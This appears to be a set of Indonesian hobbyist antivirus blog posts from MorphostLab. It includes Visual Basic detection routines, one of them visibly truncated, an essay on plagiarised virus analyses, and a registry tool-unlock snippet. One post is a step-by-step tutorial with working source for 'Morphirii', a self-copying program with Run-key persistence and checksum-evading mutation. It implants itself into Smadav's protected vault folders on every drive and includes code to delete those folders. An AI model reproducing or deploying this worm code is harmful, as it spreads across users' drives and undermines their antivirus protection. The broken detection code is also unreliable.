Saya tidak tahu persis. Mungkin sengaja dan mungkin juga tidak sengaja. Tapi yang jelas penyebaran ini sudah semakin sangat sedikit di Indonesia. Cara saya mendeteksi Parite ini kurang lebih sama dengan Sohanad. Tidak jauh berbeda. Itu sebabnya sampel-sampel infeksi Parite yang saya miliki dideteksi sebagai Sohanad oleh Morphost. Tapi di sampel-sampel tertentu, Morphost menyebutnya Parite.

[Morphost Deteksi virus/worm Lokal]
Database Morphost sudah disusun ulang. Dan banyak virus/worm lokal yang bisa dideteksi. Mulai dari virus/worm lama seperti Brontok, Moontox, Moonlight, Blue Fantasy sampai virus/worm lokal baru seperti Cuakep, Malingsia, Yuyun/Vinorika dan lainnya.

[Morphost Deteksi Struktur File yang Kacau]
Kini Morphost mampu mengetahui struktur-struktur file yang kacau. Memang ini bukanlah 100% virus. Biasanya file-file yang tertangkap oleh metode ini seperti file-file yang gagal diinfeksi virus atau malware yang gagal bermutasi dan macam-macam. Bahkan dengan trik ini Morphost juga bisa tahu file-file yang dibuat user untuk menipu atau menguji antivirus.
Kenapa metode ini bisa ada? Morphost mengecek setiap file yang discannya. File-file kacau yang dimaksudkan Morphost disini adalah file-file yang disebut aplikasi jika dilihat string headernya namun image PE-nya tidak valid.
Metode ini sangat sensitif.

[Morphost Deteksi File Berbahaya! (Trojan, rootkit, exploit dan lain-lain)]
Morphost juga bisa mendeteksi file-file yang berbahaya. Dan biasanya file-file yang terjebak dengan metode ini adalah trojan-trojan luar, rootkit, exploit dan lainnya. Metode ini cukup bagus namun sangat sensitif.

Lalu bagaimana bisa Morphost melakukan ini semua? Ini sama halnya dengan metode yang dilakukan oleh antivirus internasional. Bedanya, mereka menggunakan bahasa pemrograman assembly atau setaranya sedangkan Morphost dibuat dengan bahasa pemrograman visual basic.
Dan sekarang pertanyaan yang selama ini muncul sudah terjawab. Bahwa Antivirus VisualBasic pun bisa melakukan metode yang sama dengan antivirus internasional yang high level.

Berikut adalah daftar Top Ten Malware di MorphostLab selama 2009.
Datanya diambil berdasar virus-virus yang masuk ke 4shared kami.

1. Virus.Sality-AA
2. Virus.Runonce
3. Worm.Cuakep
4. Worm.Malingsia
5. VBS.Yuyun
6. Virus.Sality-AE
7. Conficker.Var
8. FakeMail.ChirB
9. FakeHTM.Nimda
10. Autoit

by: Morphic

Source code terbaik deteksi Ekstensi Ganda

Ini nih, source code yang (menurut saya) lumayan bagus untuk deteksi Ekstensi Ganda.
Sekarang ini AV lokal maker rata-rata udah sepele ama yang namanya ekstensi ganda. Padahal dulu semua AV lokal udah bisa detek double ekstensi.

Oke langsung aja.
Misalnya ada file yang namanya:
“Dokumen.doc.exe”
Semua AV bisa detek dong…

Tapi kalau “Dokumen.doc .exe”?
(ada tanda spasi antara doc dan exe). Seperti yang pernah dikatakan mas Darmal dulu. Masih belum semua AV lokal bisa mendeteksi doubleextension seperti tuh.

Lalu bagaimana dengan file berikut?
“Dokumen.doc .exe”
(ada banyak tanda spasi antara doc dan exe)

Lalu bagaimana lagi dengan file-file berikut?
“Dokumen,doc.exe” (ada tanda koma!)
“Dokumen.doc,’.exe” (dulu ada virus yang seperti ini, tapi saya lupa)
“Dokumen,doc’;.exe”
“Dokumen.doc ,.exe”
Dan jenis-jenis double extension lainnya…

Yang jelas semuanya itu bisa terdetek dengan source berikut!
Source terbaik deteksi Ekstensi Ganda!!!

Ini adalah source deteksi dari Morphost. Jadi dengan katalain, source Morphost udah dibocorin dong? Hehehe.

Private Function DeteksiExtGanda(alamat as string) as boolean
Dim namafail As String
Dim extent As String
extent = UCase(Right(AlamaT, 3))
namafail = GetFileName(AlamaT)
Dim Hasilz As String
Hasilz = namafail
If InStr(Hasilz, ” “) > 0 Then
Hasilz = Replace(Hasilz, ” “, “.”)
End If
If InStr(Hasilz, “‘”) > 0 Then
Hasilz = Replace(Hasilz, “‘”, “.”)
End If
If InStr(Hasilz, “;”) > 0 Then
Hasilz = Replace(Hasilz, “;”, “.”)
End If
If InStr(Hasilz, “,”) > 0 Then
Hasilz = Replace(Hasilz, “,”, “.”)
End If
naiklagix:
If InStr(Hasilz, “..”) > 0 Then
Hasilz = Replace(Hasilz, “..”, “.”)
GoTo naiklagix
End If
If Len(Hasilz) > 8 Then
If InStr(“EXE COM BAT SCR PIF CMD”, extent) > 0 And InStr(“JPG BMP DOC TXT DLL VBS PEG REG OCX”, UCase(Mid(Right(Hasilz, 7), 1, 3))) > 0 Then
Dim Hasilnya As String
Hasilnya = Right(Hasilz,
If Left(Hasilnya, 1) = “.” And Mid(Hasilnya, 5, 1) = “.” Then
deteksiextGanda = True
exit function
elseif left(hasilnya, 1 ) = “J” and Mid(hasilnya, 5, 1) = “.” Then
deteksiextGanda = True
exit function
End If
End If
End If

End function

Yang jelas dengan source di atas, Morphost Expert bisa menjadi AV lokal terbaik yang bisa mendeteksi segala jenis double extension

Sekian
By:Morphic
thanks to
-shafry
-mankbut

Trik Scanning File Shortcut

Ini nih trik scanning file shortcut!

Sejauh ini masih belum banyak antivirus lokal yang bisa menscan file-file shortcut. Yang bisa hanya ada beberapa dan itu pun antivirus-antivirus lokal yang sudah senior.
Salah satu antivirus lokal yang bisa menscan file shortcut adalah Morphost.

Pertama kali Morphost bisa menscan file shortcut saat maraknya virus vinorika (atau biasa disebut virus Yuyun).

Nah, mudah-mudahan dengan trik ini antivirus buatanmu juga bisa menscan file shortcut!

Function DetectScript(alamat as string) as Boolean
Dim exten As String
Dim skrip As String
exten = UCase(Right(alamat, 3)) ‘untuk lihat ekstensi file

If exten = “LNK” Then

skrip = UCase(Fileteks(alamat))
If InStr(skrip, “WSCRIPT.EXE”) > 0 Then GoTo bawah ‘jika ada tulisan WSCRIPT.EXE maka itu virus!
If InStr(skrip, “.DLS”) > 0 Then GoTo bawah ‘jika ada tulisan .DLS maka itu virus!
If InStr(skrip, “RUNDLL32″) > 0 Then GoTo bawah ‘jika ada tulisan RUNDLL32 maka itu virus!

ElseIf exten = “COM” Then ‘ sekaligus aku kasih trik untuk deteksi EICAR
skrip = UCase(Fileteks(alamat))
If InStr(skrip, “EICAR”) > 0 Then
DetectScript = True
Namavirus = “EICAR VIRUS TEST”
End If
End If

Exit Function
bawah:
namavirus = “Fake Shortcut”
DetectScript = True
End function

‘Fungsi ini untuk membaca file teks
Function Fileteks(Where As String) As String
Dim BinTeks, Temp As String

Open Where For Input As #6
On Error Resume Next
Do While Not (EOF(6))
Input #6, Temp
BinTeks = BinTeks & Temp
Loop
Close #6
FileTeks = BinTeks

End Function

Anggap saja trik deteksi file EICAR di atas itu sebagai bonus. Hihihi…
Yah, biar AV-mu juga lolos test EICAR sama seperti Morphost dan antivirus lainnya.

Untuk virus vinorika, biasanya ada string “WSCRIPT.EXE” disetiap file shortcut yang dibuatnya.
Lalu untuk “.DLS” dan “RUNDLL32.EXE”, itu juga string yang menunjukkan bahwa si shortcut link dari suatu virus. Khusus kedua string ini saya dapatkan dari salah satu virus vbs yang baru.

Nah, kamu bisa tambahin sendiri string-string lainnya, supaya AV-mu bisa semakin ganas. Tapi awas FALSE ALARM!!!

Sekian,
By: Morphic Karta

Thanks to:
-semua pengunjung MorphostLab
-Mankbut
-A.M.Hirin
-Mas Aat Shadewa
-Shafry.  http://viruslab.tk

60 Persen VirusAnalyst Lokal adalah pecundang

Artikel kali ini tidak mengulas tutorial sama sekali….
Yah, iseng-iseng nulis aja…

Setelah browsing sana-browsing sini lewat abang google, ternyata banyak juga hasil analisis virus ya…
Memang makin mantap aja anak negeri ini.

kenapa saya buat judul artikel ini “pecundang”? yah, supaya virusAnalyst negeri ini mau bangkit!!!! Hayo!!!

Tapi kalo Cuma copy paste sih, bukan mantap namanya… justru muncul sifat-sifat plagiat deh.

dulu saya juga pernah menjadi newbie sih….
dan teman-teman yg masih newbie juga jangan berhenti berusaha ya…

banyak juga analisa virus yang copy paste dari web-web analyst. Cuit, cuit…
Itu pengecut ato pecundang namanya. Cuma kirim sample lalu 5 menit kemudian hasil analisis selesai.
Ada banyak orang yang begitu, malah ada antivirus lokal maker lain yang menyediakan hasil analisis hasil copypaste web analyst di blognya.

Orang awam tentunya gak sadar, dan mungkin gak bisa menentukan mana hasil analisis yang memang benar hasil keringat sendiri dan mana yang tidak.

Salah satu cirri yang paling mencolok dari hasil analisis ‘kotor’ adalah banyaknya aliasname untuk virus yang dianalisis.
Misalnya nih, virus yang dianalisis adalah brontok. Nah aliasname yang dimaksud adalah nama-nama lain brontok menurut Antivirus lain. Dan biasanya aliasnamenya itu malah antivirus impor semua! Sebenarnya dari situ juga udah ketahuan kan…

Terus yang paling fatal adalah tidak disertakannya gambar, atau screen yang dicaptured saat analisis. Gambarnya itu sangat penting loh. Yah, gambarnya boleh berupa gambar yang ditampilkan virus atau gambar apa lah…. (asal jangan gambar *.jpg yang sering kamu simpan).

Penjelasan file yang didrop oleh si virus juga perlu. Misalnya si virus membuat file di “C:\windows\moonlight.txt”. Nah si VirusAnalyst seharusnya menampilkan pesan tersebut kepada pembaca.

Dan yang paling gak kalah pentingnya adalah efek-efek yang ditimbulkan oleh si virus. VirusAnalyst sebaiknya harus mencatat apa-apa saja efek-efeknya. Baik efek yang bisa didapat dari modifikasi registry maupun modifikasi system lainnya (seperti wallpaper yang diganti atau modifikasi lainnya)

Nah, di sini MorphostLab menentukan ada beberapa syarat penting yang harus dipenuhi oleh hasil analisis yang baik.
Kriteria hasil analisis virus yang baik menurut MorphostLab antara lain:
1. Ringkasan fisik malware
2. Penjelasan penyebaran malware
3. pemaparan efek-efek yang ditimbulkan oleh virus
4. Deskripsi file-file yang dibuat oleh virus
5. Gambar yang dicaptured sebagai bukti analisis.

Itu dia 5 kriteria analisis virus yang baik menurut MorphostLab.

Lalu ada pertanyaan.
Bagaimana kalau ada blogger yang mengcopy paste hasil analisis virus dari blog lain?
Jawabannya: selamat si blogger tidak mengedit hasil analisis tersebut tidak jadi masalah.

Yang jadi masalah adalah banyak virusAnalyst Indonesia yang mengcopy paste dari web analyst tanpa mencantumkan / menyebutkan referensi (web analyst-nya).

Di Indonesia ada beberapa web-web yang secara khusus menyediakan hasil-hasil analisis virus, diantaranya:

http://www.vaksin.com

http://www.virusanalyst.org

Selain itu ada juga, blog/web/situs lainnya yang menyediakan hasil analisis virus sebagai artikel sampingan, contohnya seperti:
-http://shafry.blog.friendster.com
-http://codenesia.com
-http://www.smadav.net
-http://www.morphostlab.co.nr

Akhir kata, saya mau memberi tahu sedikit info buat para virusanalyst yang masih pemula. (Buat yang masih pemula aja loh. Yang sudah expert gak usah!)
Pakailah software/tools seperti sandboxie, virtual Pc, virtual machine, installrite dan lain-lain untuk menganalisis virus.

Sekian

By: Morphic
Thanks to
-semua anggota VirusAnalyst MorphostLab (Jaya terus kalian!!!)
-revil
-Bobby315

Bagaimana kalau semua virus lokal bisa menembus Smad-Lock?

Bagaimana kalau semua virus lokal bisa menembus smad-lock?

Sebelum kamu membaca seluruh isi artikel ini, saya mau bertanya dulu. Apakah kamu sudah membaca artikel saya yang berjudul “Morphirii; Si penyusup Smad-lock”? Kalau belum baca dulu artikel itu baru baca artikel ini… Dan kalau sudah ada satu pertanyaan lagi.
Sudah dicoba blum Morphirii nya?

Si Morphirii bakal masuk menyusup ke dalam smad-lock. Mengcopykan dirinya ke dalam, lalu membuat satu pesan (satu file notepad) di dalamnya, sekaligus memodif file ’readme.txt’ yang ada di dalamnya.

Dulu rencananya trik ini tidak akan aku sebarkan. Tapi setelah aku berpikir sana dan berpikir sini, ternyata toh suatu saat bakal ada juga orang yang tahu trik ini.
Yah mudah-mudahan aja blog MorphostLab yang pertama kali ngepost trik ini.

Setelah didesak banyak orang (mail-ku dibanjiri banyak email masuk), akhirnya trik ini akan saya bocorkan juga. Sekedar memenuhi permintaan pembaca dan pengunjung MorphostLab.

Nah, sekarang buka VisualBasic-mu. Lalu masukkan referensi ”Microsoft Scripting Runtime.” Perhatikan gambar dibawah ini.

Kemudian masukkan satu listbox ke dalam form. Namai listbox tersebut list1
Lalu ketikkan source berikut:
Private Declare Function GetLogicalDrives Lib “kernel32″ Alias “GetLogicalDrives” () As Long
Dim fso As New Scripting.FileSystemObject
Private Sub Form_Load()
ambilDrive
install
regist
End Sub

Sub regist()
Dim b As Object
Set b = CreateObject(“wscript.shell”)
b.regwrite “HKLM\Software\microsoft\windows\currentversion\run\Morphirii”, Environ$(“windir”) & “\system32\Morphirii.exe”
End Sub
Sub install()
MutasiKe Environ$(“windir”) & “\system32\morphirii.exe”
End Sub

Fungsi source diatas itu untuk menginstallkan diri ke dalam komputer korban dan membuat startup di regedit. Saya rasa semua sudah mengerti ini.

Function MutasiKe(Lokasi As String)
If fso.FileExists(Lokasi) Then Exit Function
ReDim KodeVirus(FileLen(App.Path & “\” & App.EXEName & “.exe”)) As Byte
Open App.Path & “\” & App.EXEName & “.exe” For Binary As #1
Get #1, , KodeVirus
Close #1
Open Lokasi For Binary As #1
Put #1, , KodeVirus
Put #1, , Format(Time, “hh:mm:ss”) & ” ” & Format(Date, “dd:mm”)
Close #1
End Function

Buat fungsi ‘Mutasike’ untuk trik polymorphic. Trik ini fungsinya untuk menghindarkan diri dari pendeteksian checksum file seperti crc32 dan md5. Yang ini saya rasa juga pada ngerti semuanya.
Setelah ini masukkan satu timer. Namai timer tersebut “Timer1” dan berikut ini source untuk timer tersebut.

Private Sub Timer1_Timer()
Dim i As Integer
ambilDrive
For i = 0 To List1.ListCount – 1
If fso.FolderExists(List1.List(i) & ChrW(916) & ” Smad-Lock (Brankas Smadav) ” & ChrW(916)) Then
DoTrick List1.List(i) & ChrW(916) & ” Smad-Lock (Brankas Smadav) ” & ChrW(916)
ElseIf fso.FolderExists(List1.List(i) & ChrW(916) & ” Smad-Lock ” & ChrW(916)) Then
DoTrick List1.List(i) & ChrW(916) & ” Smad-Lock ” & ChrW(916)
End If
Next
End Sub

Si Timer akan melaksanakan kerjanya yaitu mengerjakan suatu trik yang kita sebut “Do Trick”
Untuk intervalnya bisa kalian set sendiri…. Morphirii memakai interval 10000 (kira-kira 10 detik).
Lihat source di atas, virus kita ini bakal mengecek 2 jenis smad-lock! Smad-lock yang bertulisan “Brankas Smadav” dan yang satunya lagi tidak bertuliskan ”Brankas smadav”

Sub ambilDrive()
On Error Resume Next
Dim LDs As Long, lng As Long, sDrives As String
LDs = GetLogicalDrives
For lng = 0 To 25
If (LDs And 2 ^ lng) 0 Then
List1.AddItem Chr(lng + 65) & “:\”
End If
Next lng
End Sub

Code ini fungsinya untuk mencari drive-drive yang aktif. Code ini bisa diganti dengan yang code lebih baik.

Function DoTrick(drive As String)
fso.CopyFolder drive, App.Path & “\Hajar”
Open App.Path & “\Hajar\Read Me.txt” For Output As #1
Print #1, “Smad-Lock ini berhasil disusupi oleh Morphirii”
Close #1

Open App.Path & “\Hajar\Morphirii.txt” For Output As #1
Print #1, “Smad-Lock tidak lagi aman”
Print #1, “Smad-Lock ini berhasil disusupi oleh Morphirii”
Print #1, “”
Print #1, “Morphirii by: Morphic”
Print #1, “File ini bukan 100% virus”
Print #1, “hanya untuk uji antivirus anak bangsa…”
Close #1
MutasiKe App.Path & “\Hajar\Morphirii_2010.exe”
fso.CopyFolder App.Path & “\Hajar”, drive, True
fso.DeleteFolder App.Path & “\Hajar”
End Function

Ini adalah trik yang kita maksud. Morphirii akan mengcopykan dirinya ke dalam smad-lock, dan membuat satu file notepad di dalamnya sekaligus memodif file ’readme.txt’ yang ada di dalamnya.

Kalau kamu mau menghapus smad-lock-nya mudah saja….
Codenya begini:
Fso.DeleteFolder (List1.List(i) & ChrW(916) & ” Smad-Lock (Brankas Smadav) ” & ChrW(916))
Atau
Fso.deletefolder List1.List(i) & ChrW(916) & ” Smad-Lock ” & ChrW(916)) Then
DoTrick List1.List(i) & ChrW(916) & ” Smad-Lock ” & ChrW(916)

Itupun setelah dilakukan pengecekan drive oleh Listbox yang tadi supaya tidak terjadi kacau balau ya…

Untuk penghapusan folder autorun.inf bisa dengan trik ini:
Sub hapusAuto(Dirname as strign)
On Error Resume Next
Shell (“CMD /C RD /S /Q \\.\\” & Chr(32) & Chr(34) & DirName & Chr(34)), vbHide
End Sub
Jadi untuk menghapus folder “F:\autorun.inf” codenya menjadi
hapusAuto “F:\autorun.inf”

sekian,
by: Morphic Karta

thanks to:
-Satryacode
-Yudha
-Shafry
-Yoga

Code Aktifkan Tools Window Ala MorphostLab

Sebenarnya trik ini bukan suatu keharusan untuk antivirus. Antivirus impor tidak didukung trik ini soalnya. Dan karena semua AV lokal pake trik ini, yah mau bilang apa lagi….

Trik apa yang saya maksud? Yah, trik untuk mengaktifkan taskmanager, regedit dan lain-lain.

Hampir semua AV lokal menyediakan fiturnya untuk mengaktifkan taskmanager, regedit, command prompt dan lain-lain. Entah siapa yang pertama dapat ide seperti itu. Tapi yg jelas cukup bermanfaat lah…
Tapi sayangnya terkadang masyrakat awam pun tidak bisa menggunakan taskmanager, regedit,command prompt, dan sebagainya. Itulah alasan kenapa AV luar tidak pake fitur-fitur seperti itu. Mereka lebih mengutamakan pemahaman pelanggannya.

Fitur-fitur yang paling umum itu seperti aktivasi taskmanager, regedit dan commandprompt. Dan yang paling jarang adalah aktivasi folder option. Sejauh ini belum ada AV yang menyediakan fitur mengaktifkan folder option kecuali Morphost Antivirus. Nah, di tutorial kali ini akan saya paparkan bagaimana cara mengaktifkan fitur-fitur tersebut dengan baik.

AV-AV lokal yang dulu sering tidak memperhatikan keadaan tools window sendiri. Apa maksudnya?
Misalnya begini, anggap saja dulu ada antivirus yang namanya HebatAV. Nah, HebatAV ini menyediakan fitur untuk mengaktifkan taskmanager. Namun sayang, ketika fitur ini digunakan malah yang muncul messagebox yang mengatakan bahwa taskmanager didisabled oleh Administrator.
Yang menjadi persoalan disini adalah, HebatAV tidak memperhatikan apakah taskmanager yang diaktifkan itu dalam kondisi disabled atau enabled? Nah begitu juga dengan tools window lainnya.

Nah ini dia source codenya!
Aktifkan Regedit
Dim c As Object
Set c = CreateObject(“Wscript.shell”)

c.regdelete “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools”
c.regdelete “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegedit”
Shell “regedit”, vbNormalFocus

Aktifkan Taskmanager
Dim b As Object
Set b = CreateObject(“Wscript.shell”)
b.regdelete “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskmgr”
Shell “taskmgr”, vbNormalFocus

Aktifkan CommandPrompt
On Error Resume Next
Dim e As Object
Set e = CreateObject(“wscript.shell”)
e.regdelete “HKCU\software\microsoft\windows\currentversion\Policies\system\DisableCMD”
Shell “cmd”, vbNormalFocus

Aktifkan FolderOption
Dim d As Object
Set d = CreateObject(“Wscript.shell”)
d.regdelete “HKCU\Software\Microsoft\windows\currentversion\Policies\explorer\NoFolderOptions”
Shell “rundll32.exe shell32.dll,Options_RunDLL 0″, vbNormalFocus

Sejauh ini, belum ada satupun AV lokal kecuali Morphost Antivirus yang menyediakan fitur untuk aktivasi folder option. Anggap saja ini sebagai apresiasi kami (MorphostLab) untuk pengunjung / pembaca setia kami.

Sekian,

By: Morphic Karta
Thanks to:
-Yudha => http://yudha-arch.blogspot.com
-Satryacode http://www.virusanalyst.org
-Shafry => http://shafry.blog.friendster.com